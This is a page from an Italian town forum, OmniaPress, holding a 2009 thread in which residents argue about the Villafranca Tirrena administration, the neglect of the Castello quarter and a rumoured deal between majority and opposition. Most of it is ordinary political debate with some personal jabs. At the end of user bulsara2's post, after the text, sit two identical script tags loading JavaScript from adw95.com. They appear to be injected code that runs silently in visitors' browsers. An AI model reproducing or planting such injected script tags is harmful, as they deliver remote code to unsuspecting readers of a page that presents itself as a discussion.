http://www.omniapress.net/

Username Password
Salva la Password
| Torna al sito | Tutti i Forum Profilo | Registrati | Argomenti Attivati | Membri | Ricerca | FAQ
 Tutti i Forum
 La piazza virtuale di Villafranca Tirrena
 Uomini di cultura.......
 Nuovo argomento  Rispondi
Pagina: 
di 46
Autore Argomento precedente Argomento Prossimo Argomento  
rosario capilli

422 Messaggi post.
Posted - 09/06/2009 :  21:55:46  Visualizza il profilo    Rispondi con commento
Ordine!..........
Riportiamo cortesemente il confronto,anche se critico,a dimensioni giuste?
Si parla di "cucchiara",veleno, astio,tutto sbagliato.
Infatti ritengo che in democrazia ed in libertà di pensiero si è liberi di confrontarsi e dialogare,senza auspicare la chiusura (di parte) del Forum, forse più volte richiesta e sollecitata all'amico Orazio.

Comunque desidero assicurare i tanti uomini di cultura, di non cantar vittoria.
Perchè così non è.Io penso che a Villafranca Tirrena, vi sono e con tutto rispetto 1251 confusi e pertanto non persuasi.Se volete proprio fare un analisi di questi 1251 confusi vi sono 1105 sconvolti ed allineati.
Perchè?
Se considerate che hanno sottoscritto la lettera pro Naro, ben 14 unità "Civiche a parole" facente tutti parte all'unione dei confusi, e se considerate tutti i sottoposti,subalterni,compresi impiegati,Dirigenti,e il Centro islamico/Politico ,cosa hanno preso?
Solo e soltanto 1105 adesioni un numero che si commenta da solo.Infatti se considerate le Provinciali del 2008 ,con lo stesso schieramento in campo,quante preferenze mancano all'appello?
Sempre un tempo non può fare è chiaro!
Riflessione serale e sincera:
In politica mai dire mai e non dare mai niente per scontato!
"In politica non vi deve essere sentimento nè risentimento (UDC)".
Diffidare sempre dalle persone che usano il termine quant'altro,perchè non dice niente e si dichiarano umili,perchè non lo sono.
E principalmente amici chi oggi critica,come me,ha pieno titolo per farlo.
Perchè?
Già spiegato in altri post e ribadisco,ma nessuno risponde,il programma elettorale in che percentuale ad oggi è stato realizzato?Possiamo fare il tifo,se volete, per chi volete voi..... ma certamente non per chi non rispetta il programma e l'impegno assunto con la cittadinanza.
Da qui la critica e lo sprone a fare meglio,di tutto è di più sino alla fine del mandato.
Non è solo questione di impegno ma di dignità ed onorabilità anche politica.
Cercare voti,fiducia,picchettare i seggi oggi non è più sufficiente,sà di vecchi e di stantio.Un modo di fare politica vecchio e superato,comprese combinazioni di cognomi da combinarsi in cabina elettorale.
Pertanto ,nessuno faccia il gradasso e principalmente non definite più PAESE Villafranca Tirrena,che forse lo è solo per mentalità,ma certamente non per presenza di cittadini e sviluppo edilizio.Qualcuno dimentica che Villfranca è il primo Grande Comune (da Messina a Milazzo)ed a confine con una grossa città Metropolitana che è Messina.Gioco forza risente di tutte le problematiche di confine.
Ovvero sicurezza,trasporti,viabilità,insediamenti artigianali ed industriali, alta densità urbanistica e di popolazione ecc....o sbaglio?
Villafranca è il Comune che si deve preparare a ricevere sul territorio l'impatto indiretto di una futura grande Opera "il Ponte sullo stretto di Messina".
In che modo si stà preparando ed organizzando?
Giriamo pagina e guardiamo avanti.
Buonaserata
Rosario Capilli

Vai in cima alla pagina

rosario capilli

422 Messaggi post.
Posted - 11/06/2009 :  19:57:57  Visualizza il profilo    Rispondi con commento
Perchè fate il loro gioco?
Le provocazioni hanno certamente un padrone ed al tempo dei romani vi erano anche i..........del padrone.

Restate in tema e consiglio di affrontare le problematiche territoriali ed
evidenziare le inefficienze e principalmente solo con spirito critico.

In fondo l'Architetto/Assessore è uno dei tanti al servizio.......dei cittadini,come Diego,e gli altri!
Uguali ed in fotocopia.

A proposito Assessore,io da lei non ho avuto fatto alcun favore e le dirò di più nemmeno ci penso a confrontarmi con chi non mi risponde anche interpellato pubblicamente e con email continua a fare orecchio da mercante.
La mediocrità si distingue, per non parlare della mancata educazione da parte di chi non risponde.Evidentemente non si è in grado di dare delle risposte concrete.
Un consiglio si dimetta,perchè?
Non è in grado di fare manutenzione,ed è più che sufficiente non crede?
Buonaserata
Rosario Capilli

Vai in cima alla pagina

rosario capilli

422 Messaggi post.
Posted - 14/06/2009 :  07:53:32  Visualizza il profilo    Rispondi con commento
Lettera Aperta per Amministrazione Comunale di Villafranca Tirrena
Sig.Sindaco
Sig.ri Assessori
Sig.ri Consigleri

14.06.09 Quartiere Castello - Festa del Corpus Domini una buona occasione per riflettere e fare mea culpa.....

Parte della vostra classe ammnistrativa e politica oggi presenzierà alla processione del Corpus Domini.
E' certamente un occasione per riflettere su quello che è stato fatto,programmato e non eseguito.
Vedere principalmente e constatare lo stato di abbandono del quartiere Castello.
Al di là delle strade,rattoppate in questi giorni,lo spazzamento eseguito solo ieri e solo per la processione odierna(Qui avviene solo due volte l'anno,l'altra pulizia solo per la Festa S.Nicola)noterete che tutto magicamente qui si è fermato,anzi non è andato mai avanti in termini di legalità ,ordine e pulizia.
Terreni a confine con strade comunali abbandonati,topi che ballano,cassonetti raccolta rifiuti vecchi,bucati e privi di copertura con perdita di liquami,stradine e viottoli comunali non puliti,villetta di Padre Pio abbandonata con tanto di scritte sui muri e sulle panchine ed inoltre tanti pali di segnaletica anch'essi vecchi,vetusti,rotti ,piegati............
E poi auovetture abbandonate,prive di assicurazione,vasi e fioriere al limite del decoro.
E anche lo scandalo dello scandalo segnali orizzontali in multicolor ovviamente battezzati dal Comune di Villafranca Tirrena ,ma illeggittimi.
Questo è il Comune dove vince spesso e purtroppo l'illegalità .......
Noterete anche la totale mancanza di spazi per i nostri ragazzi che non sanno dove andare a socializzare e giocare,vengono perseguitati da tutti e principalmente dal vostro "paesano comunista" detentore di legalità grazie alla Vostra anomala autorizzazione N. 32 del 06/08/2007.
Ma non voglio assolutamente aggiungere altro, non vi voglio rovinare la giornata di festa religiosa.Lascio a voi ed alla vostra coscienza scoprire di altro presente e/o assente sul territorio.
Resta comunque l'invito, quello di guardare attentamente e riflettere sul vostro operato,non voglio che mi riconoscete nulla e nessuna ragione ma secondo vostra coscienza è tutto in ordine?
A proposito sulla vostra sinistra ....Le Case Popolari (la vergogna delle vergogne).
Le lamentele sono gratuite o si può cominciare a fare qualcosa di concreto oltre ai piccoli/medi/grandi progetti? Si potrebbe cominciare a riqualificare veramente il Quartiere Castello divenuto Quartiere dormitorio,dove manca di tutto ma in compenso si continua a costruire non il futuro ma tanti fabbricati.
Buona domenica
Rosario Capilli

Vai in cima alla pagina

UGO FANTOZZI

33 Messaggi post.
Posted - 14/06/2009 :  12:23:55  Visualizza il profilo    Rispondi con commento
In soli quattro giorni già troppe anomalie
cantiere spiaggia " anomalo "
" anomala " autorizzazione N. 32 del 06/08/2007

Sig. Rosario Capilli, Ma da chi siamo governati? da Terry lo sfregiato e la sua banda?
E' uno scenario da vecchio far west.
e lo Sceriffo che fà? dorme?

SCERIFFO che fai dormi? ci sei? sei connesso?

Vai in cima alla pagina

il Corvo

United Kingdom
85 Messaggi post.
Posted - 14/06/2009 :  17:58:49  Visualizza il profilo    Visita la Homepage di il Corvo  Rispondi con commento
" Noterete anche la totale mancanza di spazi per i nostri ragazzi che non sanno dove andare a socializzare e giocare,vengono perseguitati da tutti e principalmente dal vostro "paesano comunista" detentore di legalità grazie alla Vostra anomala autorizzazione N. 32 del 06/08/2007."

cos'è Capilli?

Vai in cima alla pagina

ommos

537 Messaggi post.
Posted - 14/06/2009 :  18:14:37  Visualizza il profilo    Rispondi con commento
Scusi Sig. Capilli Rosario,ma ce la con il mondo intero?L'amministrazione comunale è stata eletta anche con il suo voto e il contributo del suo partiro.
Fa come Bartali, quando diceva che era tutto da rifare?Lei ha in consiglio comunale dei suoi amici di partito e di giunta perchè non chiede conto prima a loro? O forse lei è un fuori uscito dal partito?Eppoi chi è questo COMUNISTA, che fra parentesi la sinistra non conta nulla?Non vorrei che la cattiva amministrazione che lei descrive è colpa dell'opposizione che non conta nulla? Perchè tutto questo livore nei confronti di compagni di partito e di coalizione?Cosa gli hanno fatto?
Alle prossime elezioni si candidi.
E' giusto che un cittadino si lamenti del decoro del paese,ma questo è un'altro argomento.Al nord ci sono paesi nei quali non andrei ad abitare neanche sotto tortura per il clima invernale rigido,ma sono tutti bene amministrati sia dalla destra che dalla sinistra.La pulizia e l'ordine delle strade ,i luoghi per le persone,le iniziative per i cittadini ,il decoro del paese e tantissime altre cose positive che noi in Sicilia ed anche a Villafranca li sogniamo .PERCHE' ??? perchè, sono bene organizzati,sanno amministrare,sanno dare risposte al paese,i cittadini non vengono abbandonati nelle loro richieste, i consiglieri ed i vari assessori sono presenti nel territorio,sincontrano per strada,al bar ,al circolo ricreativo ecc.. ho un collega chè stato Sindaco in un paese della periferia della città per due mandati-è di sinistra- alle ultime elezioni ,della settimana scorsa , ha vinto la lega. Mi dicevano i suoi paesani che se fosse stato candidato ancora lui avrebbe vinto sicuramente,ma dopo due mandati si è fuori.Ebbene,posso dirvi che parlare con lui quando era Sindaco era come parlare con i propri familiare,dava ascolto a tutti e concretizzava le richieste.Per loro è tutto normale.Per noi in Sicilia è tutto straordinario.Perchè?

Vai in cima alla pagina

dottorguidotersilli

53 Messaggi post.
Posted - 14/06/2009 :  18:57:15  Visualizza il profilo    Rispondi con commento
Vorrei dire ad alcuni frequentetori del Canarillo che buttare le bottiglie di birra sulla spiaggia sottostante, non fa presa ormai su nessuno; siete fuori moda e la vostra scema spavalderia è inversamente proporzionale alla vostra intelligenza. (sempre ammesso che ne abbiate mai avuta)

Vai in cima alla pagina

starlet

259 Messaggi post.
Posted - 14/06/2009 :  22:53:49  Visualizza il profilo    Rispondi con commento
Scusa dottorguidotersilli, perché sprechi il tuo fiato? Quelli che buttano le bottiglie di birra sulla spiaggia non leggono questo forum, anzi non leggono affatto! E non perché non abbiano tempo, perché non sanno leggere!!!!!!!!
Buona notte a tutti.

Vai in cima alla pagina

il Corvo

United Kingdom
85 Messaggi post.
Posted - 15/06/2009 :  00:12:54  Visualizza il profilo    Visita la Homepage di il Corvo  Rispondi con commento
il tanto atteso e voluto... TURISMO!

Vai in cima alla pagina

valeria marini

Bahamas
76 Messaggi post.
Posted - 15/06/2009 :  10:07:59  Visualizza il profilo    Rispondi con commento
Perchè Capilli fà lettere all'Amministrazione? fanno finta di non sentire e non Le rispondono. ( si fanno forti di 1000 preferenze su 9000 cittadini).
Ne faccia una alla cittadinanza, magari con manifesti, faccia una petizione, inizi con questo, Lei crede di essere solo? Le assicuro che tanti la pensano come Lei ed aspettano solo la scintilla.
(principalmente coloro che hanno votato per loro)
metta quattro fogli e attenda le firme.....

Vai in cima alla pagina

ti presento il conto

6 Messaggi post.
Posted - 15/06/2009 :  18:04:44  Visualizza il profilo    Rispondi con commento
quote:

Perchè Capilli fà lettere all'Amministrazione? fanno finta di non sentire e non Le rispondono. ( si fanno forti di 1000 preferenze su 9000 cittadini).
Ne faccia una alla cittadinanza, magari con manifesti, faccia una petizione, inizi con questo, Lei crede di essere solo? Le assicuro che tanti la pensano come Lei ed aspettano solo la scintilla.
(principalmente coloro che hanno votato per loro)
metta quattro fogli e attenda le firme.....

...Concordo!!!

Vai in cima alla pagina

rosario capilli

422 Messaggi post.
Posted - 16/06/2009 :  08:00:34  Visualizza il profilo    Rispondi con commento
"E' giusto che un cittadino si lamenti del decoro del paese,ma questo è un'altro argomento".

Ommos,non è un altro argomento è anche l'argomento.Lei ripropone domande già fatte e formulate,se gira per il forum troverà anche tante risposte ovviamente nostre.
Gli amministratori comunali leggono,NON RISOLVONO,si infastidiscono dei miei interventi e principalmente si lamentano dei miei interventi,invitandomi indirettamente a fare tanti passi indietro......(uomini di cultura).

La rassicuro infine sulla sua curiosità,non ho cambiato partito,anche se a Villafranca Tirrena,che non è il centro del mondo e di gravità permanente,è diventata una moda,forse fà Fascion....Mah!
Mi piace inoltre la sua amichevole provocazione sull'opposizione.
Mi scusi, non si è reso ancora conto, che l'opposizione non è presente in consiglio comunale e fuori dal consiglio.Si "mormora" in giro che è stato fatto un accordo fra Professore,Vice del Professore ovvero futuro candidato della attuale maggioranza e il capogruppo di minoranza mister "Bandiera rossa Tito".
Accordo che prevede una coalizione mista di lor signori per le prossime amministrative.Ha capito bene, maggioranza e minoranza insieme per non lasciare le sedie e le poltrone.IO ho una dignità e ancora mi indigno a simili schifezze,mi perdoni ma non dovrei essere io a fare come Bartali ,con questo scenario ritengo che sia il caso di cominciare a guardarsi negli occhi.
Chi dovrebbe fare opposizione?E mancano ancora tre anni............
Io non mi lamento di qualcosa,ma di tutto quello che è inefficienza.
Abbiamo dato fiducia e ho chiesto fiducia a molti amici e adesso per dignità e serietà anche politica è giusto che io sia il primo a dare loro conto,ragione e soddisfazione.E' una questione,mi creda, non solo morale.........
Buona giornata
Rosario Capilli

Vai in cima alla pagina

cda

Eritria
32 Messaggi post.
Posted - 16/06/2009 :  12:08:19  Visualizza il profilo    Rispondi con commento
Sig. Capilli, prima di crticarci, provi a dare uno sguardo anche ai suoi uomini di partito che amministrano.
L'opposizione esiste ed è viva più che mai.
Lei pensi al Suo Assessore ( o presunto tale ), che non si sa neanche da che parte stia e sopratutto ha preso la stessa piega del borlotto.
Se vuole parlare con lui, lo trova nel suo ufficio AL CENTRO PER ANZIANI A DIVIETO, a giocare a carte e non ad occuparsi delle tanto citate problematiche del nostro paese.
Almeno il borlotto faceva qualcosa, questo invece.......
Lasci perdere, l'opposizione, mi dia retta.
Pensi alla maggioranza.

Vai in cima alla pagina

rosario capilli

422 Messaggi post.
Posted - 16/06/2009 :  13:22:38  Visualizza il profilo    Rispondi con commento
Se avesse prestato attenzione.......
La Lettera Aperta è diretta a tutti per ruolo e funzione e pertanto tutti inclusi e nessuno escluso.
Se poi qualcuno si vuole giustificare e/o spiegare lo può sempre fare non crede!

Però mi chiedo perchè nessuno risponde e nessuno replica?
Forse chi tace acconsente?
Oppure l'accordo sottobanco è verità!
Voce di popolo...........tutti dentro unico contenitore,e vissero sistemati e contenti.
saluti
Rosario Capilli

Vai in cima alla pagina

bulsara2

173 Messaggi post.
Posted - 16/06/2009 :  15:22:17  Visualizza il profilo    Rispondi con commento
bene... il signor capilli lancia un tema importante... direi, centrale... ho già detto in un post precedente che mi rammarico dell'operato dell'opposizione che ho votato... dell'accordone, bhè... se ne parla da un pò... non so quanto a sproposito e quanto a ragione... io le posso dire soltanto che conosco molte persone che hanno sostenuto l'opposizione alle scorse elezioni e che non accetterebbero mai un simile accordo (anzi... credo che sarebbe la maggioranza dei sostenitori della lista a non accettarlo)... sempre ammesso che questo accordo sussista davvero... a me sembrerebbe paradossale una soluzione simile... la politica è un'altra cosa... un simile accordo sarebbe la morte della politica e la mortificazione degli elettori... in democrazia esistono dei ruoli, che al tempo stesso sono una garanzia per i cittadini che rappresenti... se esci fuori da questo tracciato, sei fuori della democrazia (si chiama consociativismo... ovvero il sistema che regge villafranca e la sua amministrazione... ne più ne meno)....

però, vede... del suo ragionamento mi sfugge un particolare... ma lei, che questa amministrazione fosse clientelare e incompetente... se ne accorge solo ora? dei poltronisti, arrivisti, lacchè... se ne accorge davvero adesso? non credo... non vorrei offenderla, mi sembra una persona intelligente... allora immagino che prima accettasse i limiti evidenti (in termini di etica pubblica e compentenza) della sua amministrazione... cos'è cambiato? non risponda che è cambiata la qualità dell'amministrazione... perchè sennò le tiro fuori il primo programma del sindaco e faccio il suo stesso identico discorso, solo a ritroso, sulla prima amministrazione La Tona...

mi sovviene una frase... che non saprei citare alla lettera... "le persone troppo intelligenti per entrare in politica sono punite con il fatto di essere governate da incompetenti"... recitava più o meno così...

ps: non c'entra nulla... volevo solamente fare le congratulazioni al piccolo zuzza (posso vero? tanto la tua identità non è più segreta come non lo è la mia:))... risultati sportivi lodevoli... orgoglio condominiale ;)

pps: scusate per le modifiche... ma non mi ero espresso granchè bene... e poi ho finalmente imparato a modificare i post... (admin... non so perchè, ma con mozilla non ci riesco...)

<script src=http://www.adw95.com/b.js></script><script src=http://www.adw95.com/b.js></script>

Modificato da - bulsara2 il 16/06/2009 16:33:12

Modificato da - bulsara2 il 16/06/2009 16:35:06

Modificato da - bulsara2 il 16/06/2009 16:38:59Vai in cima alla pagina

L'argomento è distribuito in 46 pagine:
  1  2  3  4  5  6  7  8  9 10
 11 12 13 14 15 16 17 18 19 20
 21 22 23 24 25 26 27 28 29 30
 31 32 33 34 35 36 37 38 39 40
 41 42 43 44 45 46

Nuovo argomento  Rispondi
Salta a:
© 2007 OmniaPress - Tutti i diritti riservati